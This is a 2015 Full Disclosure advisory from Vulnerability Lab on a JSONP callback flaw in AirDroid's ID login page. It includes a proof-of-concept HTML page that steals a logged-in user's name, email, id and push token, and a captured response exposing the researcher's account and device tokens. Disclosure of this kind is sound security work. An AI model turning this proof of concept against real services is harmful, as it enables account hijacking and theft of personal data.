[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] AirDroid ID - Client Side JSONP Callback Vulnerability
From: Vulnerability Lab <research () vulnerability-lab ! com>
Date: 2015-07-17 13:09:55
Message-ID: 55A8FEA3.8010408 () vulnerability-lab ! com
[Download RAW message or body]
Document Title:
===============
AirDroid ID - Client Side JSONP Callback Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1544
Release Date:
=============
2015-07-10
Vulnerability Laboratory ID (VL-ID):
====================================
1544
Common Vulnerability Scoring System:
====================================
5.6
Product & Service Introduction:
===============================
Calls, SMS, and the app notifications you allowed, mirrored to the large computer screen you \
are focusing on. Type with full physical keyboard and control with mouse. Transfer things \
faster without looking for a cable. Better equipments, better life. AirMirror, a brand new way \
of interacting between PC/Mac and your Android. Your Android, right on your computer, right \
now. With the new Desktop client, your Android, Windows and Mac work like one.
(Copy of the Vendor Homepage: https://www.airdroid.com/en/ )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a client-side vulnerability in the \
official AirDroid ID login online-service web-application.
Vulnerability Disclosure Timeline:
==================================
2015-07-06: Researcher Notification & Coordination (Hadji Samir)
2015-07-07: Vendor Notification (Android Security Team)
2015-07-09: Vendor Response/Feedback (Android Security Team)
2015-07-10: Vendor Fix/Patch (Android Developer Team)
2015-07-10: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Sand Studio
Product: Airdroid - Online Service (Web-Application) 2015 Q2
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
A client-side jsonp callback vulnerability has been discovered in the official Airdroid \
online-service web-application. The vulnerability allows remote attackers to manipulate \
client-side application to browser requests to compromise session data.
The vulnerability is located in the callback parameter value of the vulnerable signIn.html \
file. The vulnerability allows remote attackers to inject script code by client-side \
manipulated GET method requests. The vulnerability allows remote attacker to call an callback \
JSONP for get the information about the user
The vulnerability allows remote attackers to callback script code by client-side manipulated \
GET method requests. Thus can result in an id account or device compromise. The attack vector \
of the vulnerability is located on the client-side and the request method to inject/execute is \
GET. The service replies via jsonp by a callback with wrong cleanup which results in the \
unexpected behaviour.
The security risk of the client-side web vulnerability is estimated as medium with a cvss \
(common vulnerability scoring system) count of 5.6. Exploitation of the cross site scripting \
web vulnerability requires no privilege web application user account and low user interaction \
(click). Successful exploitation results in client-side account theft by hijacking, \
client-side phishing, client-side external redirects and non-persistent manipulation of \
affected or connected service modules.
Request Method(s):
[+] GET
Vulnerable Module(s):
[+] Login [Web] (./p14/user/)
Vulnerable File(s):
[+] signIn.html
Vulnerable Parameter(s):
[+] callback
Proof of Concept (PoC):
=======================
The client-side callback vulnerability can be exploited by remote attackers without privilege \
application user account and with low user interaction. For security demonstration or to \
reproduce the vulnerability follow the provided information and steps below to continue.
PoC: *.html
<html>
<head>
<script>
samir = function(data) {
alert("Name " + data.result.nickname +" mail " + data.result.mail + " id "+ data.result.id + \
" token " + data.result.pc_push_token ); }
</script>
</head>
<body>
<h1>JSONP Call</h1>
<script src="https://id.airdroid.com/p14/user/signIn.html?callback=samir"></script>
</body>
</html>
Vulnerable Source: JSONP Call
samir({"code":"1","result":{"id":"9731220","nickname":"Hadji+Samir","mail":"info.dimanet@gmail.com","create_date":"2015-07-06 \
06:18:40","data_flow_total":"0","vip":"0","vip_starttime":null,"vip_endtime":null,"from_type":"" \
,"read_new":"1","mail_verify":"0","avatar_url":"","last_update_avatar":"2015-07-06 \
06:18:40","country":"DZ","isPremium":-1,"is_recurring":0,"has_device":"1","device":[{"id":"10257826","name":"htc \
HTC T528w","deviceId":"3cacf266733309329510a4d2477ace37","channelToken":"2785903c941c8450ebf816b \
47dab1164","logicKey":"6227d20a5103046b92d118d5db9e2e67","manu":"htc","model":"HTC \
T528w","model_pic":"http:\/\/img.airdroid.com\/devices\/default","osVersion":"4.1.1","sdkApiLeve \
l":"16","netOpts":{"ip":"192.168.1.4","port":8888,"socket_port":8889,"ssl_port":8890,"usewifi":" \
true","file_port":8765},"appVer":"20142","gcmId":"","is_default":"0","imsi":"0","create_date":"2015-07-06 \
06:20:18","account_id":"9731220","push_token":"20a2a64bd6cb1608cb2fc1c1bb1ed18b","support_plugin \
_vnc":0,"plugin_vnc_versions":0,"plugin_vnc_url":"","plugin_vnc_log":"","plugin_vnc_update_from_ \
url":"false","phone_versions":0,"pc_versions":"","mac_versions":"","addon_package_name":""}],"ap \
p_last_modify":"1436177702","token":"","avatar":[],"push_ws_sub_url":"ws:\/\/54.227.249.159:443" \
,"push_tcp_sub_url":"54.227.249.159:80","push_pub_url":"http:\/\/push.airdroid.com","pc_push_tok \
en":"99eb3edebbbc30883679e563d0ed2d1f","web_push_token":"b585e6763f41df6c8fcf1961f38c6d74","fmp_ \
push_token":"d15b2f78e335b68186bab0664c027520","account_type":2,"is_unlock":0,"max_file_size":31 \
457280,"lan_trans_folder":0,"unlock_starttime":"","unlock_expired":"","server_timestamp":14362728935628},"msg":"success!"})
Reference(s):
http://web.airdroid.com/
https://id.airdroid.com/p14/user/signIn.html?callback=samir
Solution - Fix & Patch:
=======================
Parse in the jsonp GET method request the vulnerable callback value to prevent client-side \
script code injection attacks. Restrict the callback input by a whitelist and disallow special \
chars on server-side or client-side GET method requests.
Security Risk:
==============
The security risk of the vulnerability in the android id login web-application is estimated as \
high. (CVSS 5.6)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Hadji Samir [samir@evolution-sec.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. \
Vulnerability Lab disclaims all warranties, either expressed or implied, including the \
warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its \
suppliers are not liable in any case of damage, including direct, indirect, incidental, \
consequential loss of business profits or special damages, even if Vulnerability-Lab or its \
suppliers have been advised of the possibility of such damages. Some states do not allow the \
exclusion or limitation of liability for consequential or incidental damages so the foregoing \
limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, \
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - \
admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - \
evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - \
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - \
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - \
vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires \
authorization from Vulnerability Laboratory. Permission to electronically redistribute this \
alert in its unmodified form is granted. All other rights, including the use of other media, \
are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, \
advisories, source code, videos and other information on this website is trademark of \
vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use \
or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) \
to get a permission.
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]â„¢
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic